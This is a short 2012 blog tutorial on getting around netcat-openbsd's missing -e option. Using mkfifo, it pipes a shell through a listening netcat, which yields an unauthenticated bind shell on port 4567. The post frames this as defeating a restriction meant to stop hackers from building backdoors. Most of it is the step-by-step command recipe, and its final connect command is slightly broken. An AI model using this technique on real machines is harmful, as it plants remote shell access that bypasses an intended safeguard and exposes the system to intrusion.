Wednesday, February 1, 2012

Using "mkfifo" to Bypass Netcat's OpenBSD Limitation

There are two version of Netcat, traditional and openbsd. 
The traditional version is the one that I've been used in my previous post. It have more function than the openbsd version.
In the openbsd version we can't add -e command. This because the openbsd version is designed to prevent the hacker who want to make a backdoor use it. This way, we can't create a shell.

But, there's a way to bypass it using mkfifo. Mkfifo help us to create a pipe connection. Pipes allow separate process to communicate without having been designed explicitly to work together. This allows tools to combine their function in complex ways.
Mkfifo takes one or more file names as arguments or commands for the specified task and creates pipes with those names.
Ok. Lets start..

1. Remove the netcat-traditional and install netcat-openbsd to your ubuntu machine.
# apt-get remove netcat-traditional
# apt-get install netcat-openbsd

2. Lets make sure that "-e" command will not be known by nc
# nc -e

3. Lets make the fifo file 
# mkfifo fifo/pipe
I named the fifo file "pipe" and place it in "fifo" directory

4. Lets execute the command to start the nc server in addition with the fifo file that we created.
# sh fifo/pipe | nc -l 4567 > fifo/pipe

5. Connect to it using backtrack in usual way and test using "ls" command.
# nc 4567

There you go, a nice shell is spawn on the system without -e command.  :)

"the quieter you become, the more you are able to hear.."


Post a Comment